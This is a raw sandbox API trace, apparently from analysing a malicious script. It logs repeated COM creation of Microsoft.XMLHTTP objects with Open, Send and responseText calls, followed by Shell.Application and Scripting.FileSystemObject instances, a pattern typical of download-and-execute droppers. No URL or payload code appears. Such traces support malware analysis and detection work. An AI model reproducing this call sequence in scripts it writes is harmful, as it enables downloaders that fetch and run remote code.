	[0425.519] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0425.519] ??2@YAPEAX_K@Z () returned 0x62f310
	[0425.519] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0425.519] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0425.520] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0425.520] SysStringLen (param_1=0x0) returned 0x0
	[0425.520] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0425.520] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0425.520] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0425.520] ??2@YAPEAX_K@Z () returned 0x62f330
	[0425.520] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0425.520] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0425.520] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0425.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0425.520] longjmp () 
	[0425.521] longjmp () 
	[0425.521] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0425.521] SysStringLen (param_1=0x0) returned 0x0
	[0425.521] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0425.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0425.521] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0425.521] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0425.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0425.521] ??2@YAPEAX_K@Z () returned 0x62f310
	[0425.521] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0425.521] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0425.521] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0425.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0425.521] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0425.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.521] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0425.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0425.521] longjmp () 
	[0425.521] longjmp () 
	[0425.522] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0425.522] SysStringLen (param_1=0x0) returned 0x0
	[0425.522] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0425.522] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0425.522] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0425.522] ??2@YAPEAX_K@Z () returned 0x62f330
	[0425.522] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0425.522] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0425.522] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.522] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.522] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0425.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0426.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0426.852] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0426.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0426.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0426.852] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0426.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0426.852] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0426.852] SysStringLen (param_1=0x0) returned 0x0
	[0426.852] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0426.852] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0426.852] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0426.852] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0426.852] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0426.852] ??2@YAPEAX_K@Z () returned 0x62f350
	[0426.853] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0426.853] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0426.853] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0426.853] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0426.853] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0426.853] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0426.853] SysStringLen (param_1=0x0) returned 0x0
	[0426.853] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0426.856] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0426.856] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0426.856] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0426.856] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0426.856] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0426.856] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0427.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0427.752] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0427.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0427.753] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0427.753] SysStringLen (param_1=0x0) returned 0x0
	[0427.753] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0427.753] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
